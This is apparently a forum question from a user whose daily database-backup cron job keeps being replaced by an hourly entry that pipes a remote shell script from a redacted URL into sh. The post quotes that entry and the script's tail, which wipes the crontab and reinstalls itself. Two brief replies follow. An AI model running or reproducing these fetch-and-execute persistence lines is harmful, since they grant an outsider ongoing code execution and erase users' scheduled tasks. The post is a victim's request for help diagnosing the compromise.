# Cron Job missing everyday

Tags: shell, cron

I used to have a cron job to run daily backup of a database:

```
00 3 * * * ~/bin/dbbackup.sh
```

When I checked it 2 days ago it was missing and a new cron job (url) was added:

```
*/60 * * * *  curl https://<SOME_URL_POINTING _TO_SH_FILE> | sh
```

So I just removed the cron job (url) and replaced back with mine thinking someone might have accidentally deleted it or was testing something.  But the next day my cron job was missing and again the cron job (url) is back.  Everytime I change it back the next day it just keeps reverting back to the cron job (url).

When I check inside the link of the url (https://) for the sh file.  The end of the file has this piece of code:

```
crontab -r
(crontab -l;printf '*/60 * * * *  curl https://<SOME_URL_POINTING _TO_SH_FILE> | sh \n')|crontab -
```

It seems the cron job (url) is removing everything and replacing it with this but what I don't understand is I already removed the cron job (url) in my crontab -e so how come it can still run?

Comment: How do you placed the jobs in crontab? by space separated or by tab separated? Is it saving the file properly?

Comment: Check the content of dbbackup.sh - maybe it's not what you think it is anymore. Also, I recommend you monitor your cronjob so you get alerted if it doesn't run anymore. I'm partial to [WDT.io](https://wdt.io).